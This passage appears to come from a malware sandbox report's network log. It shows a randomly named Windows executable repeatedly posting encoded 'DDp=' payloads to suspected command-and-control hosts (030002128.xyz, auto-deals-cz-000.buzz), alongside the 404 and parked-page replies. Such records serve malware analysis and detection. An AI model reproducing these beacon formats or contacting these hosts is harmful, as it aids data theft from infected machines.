                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 52 7a 64 6c 38 64 48 68 4d 45 32 31 72 74 43 6e 30 68 33 2b 34 33 44 63 70 36 35 46 35 57 30 50 44 51 5a 62 48 39 54 70 34 73 57 7a 32 36 7a 46 34 65 61 71 46 5a 71 44 61 50 4f 39 62 6e 42 6b 53 71 56 39 38 44 51 76 7a 31 57 66 51 68 68 2b 45 38 6a 56 6e 75 34 31 41 58 58 41 37 68 2f 71 2b 71 30 49 42 4e 33 2f 54 4b 31 76 5a 42 64 61 75 6e 69 65 2b 33 74 31 67 4e 69 64 49 6d 4a 4b 77 4a 58 78 5a 57 2b 57 55 32 57 47 50 2b 58 49 7a 4e 48 6b 41 64 74 70 73 54 6b 4d 6d 43 75 70 2f 58 63 41 52 34 7a 74 79 75 78 63 30 5a 6f 51 58 39 53 47 51 53 63 6b 78 48 2b 4a 4d 53 34 56 75 66 59 67 55 48 6f 5a 46 79 71 4b 34 2f 63 67 6e 53 56 6a 34 49 72 68 58 62 7a 50 78 49 66 58 6d 51 3d 3d
                                                                                                        Data Ascii: DDp=Rzdl8dHhME21rtCn0h3+43Dcp65F5W0PDQZbH9Tp4sWz26zF4eaqFZqDaPO9bnBkSqV98DQvz1WfQhh+E8jVnu41AXXA7h/q+q0IBN3/TK1vZBdaunie+3t1gNidImJKwJXxZW+WU2WGP+XIzNHkAdtpsTkMmCup/XcAR4ztyuxc0ZoQX9SGQSckxH+JMS4VufYgUHoZFyqK4/cgnSVj4IrhXbzPxIfXmQ==
                                                                                                        Nov 6, 2024 08:42:19.923552036 CET1236INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Nov 2024 07:42:19 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        ETag: W/"66cce1df-b96"
                                                                                                        Content-Encoding: gzip
                                                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                        Nov 6, 2024 08:42:19.923798084 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        43192.168.2.650028161.97.142.144804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:42:21.640878916 CET1847OUTPOST /knx2/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.030002128.xyz
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 1244
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.030002128.xyz
                                                                                                        Referer: http://www.030002128.xyz/knx2/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 52 7a 64 6c 38 64 48 68 4d 45 32 31 72 74 43 6e 30 68 33 2b 34 33 44 63 70 36 35 46 35 57 30 50 44 51 5a 62 48 39 54 70 34 71 4f 7a 32 70 72 46 35 35 47 71 58 4a 71 44 51 76 4f 34 62 6e 41 6d 53 71 74 35 38 44 63 2f 7a 7a 53 66 4b 42 39 2b 42 49 2f 56 73 75 34 31 64 6e 58 4e 6b 52 2f 7a 2b 75 59 4d 42 4a 62 2f 54 4b 31 76 5a 48 35 61 70 31 61 65 38 33 74 32 6e 4e 69 52 4d 6d 4a 79 77 4e 37 4c 5a 57 71 47 55 43 69 47 4f 65 48 49 38 65 6a 6b 4d 64 74 6e 70 54 6c 4d 6d 43 79 49 2f 58 77 36 52 34 75 34 79 75 46 63 33 74 4d 47 41 63 54 46 4f 6a 4d 49 6d 30 36 55 49 6c 38 2f 6a 38 45 49 52 6c 39 72 50 44 47 44 2f 36 45 66 79 44 51 55 32 75 50 38 55 4d 71 4f 38 71 53 49 35 73 65 6d 75 4b 56 76 55 38 43 38 67 6d 66 73 4f 44 64 5a 51 78 41 73 4b 67 54 72 35 77 35 57 5a 6f 39 6b 48 57 75 77 50 44 2b 57 36 56 49 36 48 31 35 74 61 74 43 77 71 50 6c 75 39 5a 4c 57 70 77 6e 6d 66 76 46 62 44 55 33 6d 79 43 35 66 50 33 54 59 48 7a 43 77 67 53 57 48 41 4a 4f 77 72 50 68 4f 37 59 66 66 31 71 33 55 30 51 [TRUNCATED]
                                                                                                        Data Ascii: DDp=Rzdl8dHhME21rtCn0h3+43Dcp65F5W0PDQZbH9Tp4qOz2prF55GqXJqDQvO4bnAmSqt58Dc/zzSfKB9+BI/Vsu41dnXNkR/z+uYMBJb/TK1vZH5ap1ae83t2nNiRMmJywN7LZWqGUCiGOeHI8ejkMdtnpTlMmCyI/Xw6R4u4yuFc3tMGAcTFOjMIm06UIl8/j8EIRl9rPDGD/6EfyDQU2uP8UMqO8qSI5semuKVvU8C8gmfsODdZQxAsKgTr5w5WZo9kHWuwPD+W6VI6H15tatCwqPlu9ZLWpwnmfvFbDU3myC5fP3TYHzCwgSWHAJOwrPhO7Yff1q3U0QfAe0Nyjtha1vj/n7BEuegn+zHM2hdfwNlJmUMDni2wa51qD2IRhgJKPqcBNH5pKgPy7if6CqVKK+uD21gXLvwrObNO8OBJVwy/a+L76Oz/8adAgizdwpLqIuLBVNTcpczqrQwasv36oHnZz/bz4UXFwlkd2ggrxDohknrE19HTCQkk5YfwQx8Cc8A2nYQwvaIoXpVTMMUJy92ayXWJN22e/9S/UdOK7fqNPqC8jEdK8yEjKpeAK/N8oWbTcnG+4kSwTQdgbZyfTVQxvGWFT6aRYMS+yv15n55V+k/zQgH6elyxo5fsZTH3XD1hIgFHZgevAjwU6Hpt/u5rP1452Ac4WMKoJDWfC6m0nf9zuCapFibYi9UYr/X2C7VRvFGX+VYJ3dfAYhOSaHR9Xzu26hULP2g4HmUYdSrnCPr3Z29eWe/H+ynGdphQpnXEIadZofiqUl1ovZdkCuYAChjzBANfHJKyqmuJd1BAhoyTWgnNnZz+yOQ+3bLrLePFkXbb+1Q4yxMrjJCF8nzNYk4YMAwrDSEc+pj8r8qd7qQ5sG8aa1HEp0U3Py5hN9wGFT1J7/JvdmWGg51ikiHyjuqrSMT+5nSVHxz8GNDpjlFKLRthvS9acnGHQkCtX2Sk9InAF8yg7wL/HSJXzLqYWzns3F4mHhBgaySusmu1 [TRUNCATED]
                                                                                                        Nov 6, 2024 08:42:22.488420010 CET1236INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Nov 2024 07:42:22 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        ETag: W/"66cce1df-b96"
                                                                                                        Content-Encoding: gzip
                                                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                        Nov 6, 2024 08:42:22.488435984 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        44192.168.2.650029161.97.142.144804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:42:24.184984922 CET550OUTGET /knx2/?DDp=cx1F/qf6XWf+sqaNqgWjpjf2u/FJ3U1rCAFJJdWfl5OjgpHNlJW/Jou+UuCSZllgDcZAwgAs0R21dhdWF/X3usItMGO4lmDkyY4fIJ/HYM1kf3catma7zBplk9C6FFtSionVViQ=&SvrLY=3P8lALA HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.030002128.xyz
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Nov 6, 2024 08:42:25.010678053 CET1236INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 06 Nov 2024 07:42:24 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Content-Length: 2966
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        ETag: "66cce1df-b96"
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                                                        Nov 6, 2024 08:42:25.010694027 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                                                        Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                                                        Nov 6, 2024 08:42:25.010711908 CET698INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                                                                        Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        45192.168.2.650030199.59.243.227804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:42:30.242670059 CET837OUTPOST /geci/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.auto-deals-cz-000.buzz
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 208
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.auto-deals-cz-000.buzz
                                                                                                        Referer: http://www.auto-deals-cz-000.buzz/geci/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 44 57 30 30 66 36 69 37 6f 55 49 51 53 69 5a 2f 38 55 36 62 59 61 41 46 6d 55 32 79 72 54 70 63 49 77 33 66 61 4d 4d 45 73 78 56 4c 49 71 4a 57 4d 74 6b 4e 61 5a 68 6f 72 55 74 4f 4a 51 49 31 76 52 71 41 51 4b 31 6d 30 64 6e 4f 61 51 35 44 72 39 62 4d 78 46 55 77 44 49 68 79 36 63 56 41 4e 68 4f 45 50 68 4b 6c 48 48 46 52 38 57 51 56 65 38 36 52 58 76 30 78 41 6c 5a 30 46 36 51 6b 66 5a 61 47 59 77 30 47 31 47 6c 38 78 43 42 6b 50 58 61 43 36 75 57 61 31 6b 42 73 44 32 46 4d 6e 6c 2b 49 4c 73 61 45 75 49 7a 5a 52 70 70 69 50 33 44 33 67 71 32 69 6f 45 47 2f 41 76 44 75 62 64 63 39 67 67 2b 43 50 44 4f 36
                                                                                                        Data Ascii: DDp=DW00f6i7oUIQSiZ/8U6bYaAFmU2yrTpcIw3faMMEsxVLIqJWMtkNaZhorUtOJQI1vRqAQK1m0dnOaQ5Dr9bMxFUwDIhy6cVANhOEPhKlHHFR8WQVe86RXv0xAlZ0F6QkfZaGYw0G1Gl8xCBkPXaC6uWa1kBsD2FMnl+ILsaEuIzZRppiP3D3gq2ioEG/AvDubdc9gg+CPDO6
                                                                                                        Nov 6, 2024 08:42:30.853243113 CET1236INHTTP/1.1 200 OK
                                                                                                        date: Wed, 06 Nov 2024 07:42:30 GMT
                                                                                                        content-type: text/html; charset=utf-8
                                                                                                        content-length: 1158
                                                                                                        x-request-id: d57c27a5-209c-4e59-bc95-0d7c82c58d5a
                                                                                                        cache-control: no-store, max-age=0
                                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VW4CBoa3Xe3VwtrJKaNFz44itmWXfIGD8DWMZ4wZZSGzavsy7ofvJzIydNlKFSGI8v9WEBhtAA/k6bBayOmKYQ==
                                                                                                        set-cookie: parking_session=d57c27a5-209c-4e59-bc95-0d7c82c58d5a; expires=Wed, 06 Nov 2024 07:57:30 GMT; path=/
                                                                                                        connection: close
                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 57 34 43 42 6f 61 33 58 65 33 56 77 74 72 4a 4b 61 4e 46 7a 34 34 69 74 6d 57 58 66 49 47 44 38 44 57 4d 5a 34 77 5a 5a 53 47 7a 61 76 73 79 37 6f 66 76 4a 7a 49 79 64 4e 6c 4b 46 53 47 49 38 76 39 57 45 42 68 74 41 41 2f 6b 36 62 42 61 79 4f 6d 4b 59 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VW4CBoa3Xe3VwtrJKaNFz44itmWXfIGD8DWMZ4wZZSGzavsy7ofvJzIydNlKFSGI8v9WEBhtAA/k6bBayOmKYQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                        Nov 6, 2024 08:42:30.853271961 CET611INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDU3YzI3YTUtMjA5Yy00ZTU5LWJjOTUtMGQ3YzgyYzU4ZDVhIiwicGFnZV90aW1lIjoxNzMwODc4OT


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        46192.168.2.650031199.59.243.227804156C:\Program Files (x86)\qAqHLaUqGdGSibnbsuFbwLxvAFPQuvrbSfOEHrLLRJmfJjxgfxcBbqhSgrhXlwnHFn\FuFneNIzDsF.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 6, 2024 08:42:32.796104908 CET861OUTPOST /geci/ HTTP/1.1
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Host: www.auto-deals-cz-000.buzz
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Content-Length: 232
                                                                                                        Cache-Control: no-cache
                                                                                                        Origin: http://www.auto-deals-cz-000.buzz
                                                                                                        Referer: http://www.auto-deals-cz-000.buzz/geci/
                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                                        Data Raw: 44 44 70 3d 44 57 30 30 66 36 69 37 6f 55 49 51 54 43 4a 2f 37 33 69 62 61 36 41 47 70 30 32 79 68 7a 70 69 49 77 7a 66 61 4f 38 55 73 44 78 4c 49 4c 35 57 4e 73 6b 4e 5a 5a 68 6f 7a 6b 74 58 58 67 49 45 76 52 75 6d 51 49 68 6d 30 64 7a 4f 61 56 46 44 72 4f 7a 50 78 56 55 79 50 6f 68 30 30 38 56 41 4e 68 4f 45 50 68 50 79 48 48 64 52 38 43 73 56 66 5a 57 65 65 50 30 79 48 6c 5a 30 50 61 51 67 66 5a 61 6f 59 78 70 74 31 45 4e 38 78 47 46 6b 4f 47 61 42 6a 65 57 59 2f 45 41 54 4b 6e 34 41 67 48 2f 72 42 63 4b 46 2b 76 2f 6f 5a 2f 30 34 54 45 44 55 79 36 57 67 6f 47 65 4e 41 50 44 45 5a 64 6b 39 79 33 79 6c 41 33 72 5a 4d 76 55 55 4a 37 51 66 68 67 70 59 53 6e 6c 41 65 65 41 43 7a 67 3d 3d
                                                                                                        Data Ascii: DDp=DW00f6i7oUIQTCJ/73iba6AGp02yhzpiIwzfaO8UsDxLIL5WNskNZZhozktXXgIEvRumQIhm0dzOaVFDrOzPxVUyPoh008VANhOEPhPyHHdR8CsVfZWeeP0yHlZ0PaQgfZaoYxpt1EN8xGFkOGaBjeWY/EATKn4AgH/rBcKF+v/oZ/04TEDUy6WgoGeNAPDEZdk9y3ylA3rZMvUUJ7QfhgpYSnlAeeACzg==
                                                                                                        Nov 6, 2024 08:42:33.416079998 CET1236INHTTP/1.1 200 OK
                                                                                                        date: Wed, 06 Nov 2024 07:42:32 GMT
                                                                                                        content-type: text/html; charset=utf-8
                                                                                                        content-length: 1158
                                                                                                        x-request-id: c5eedf0a-25aa-4adc-80bb-27a5705dd974
                                                                                                        cache-control: no-store, max-age=0
                                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                                        vary: sec-ch-prefers-color-scheme
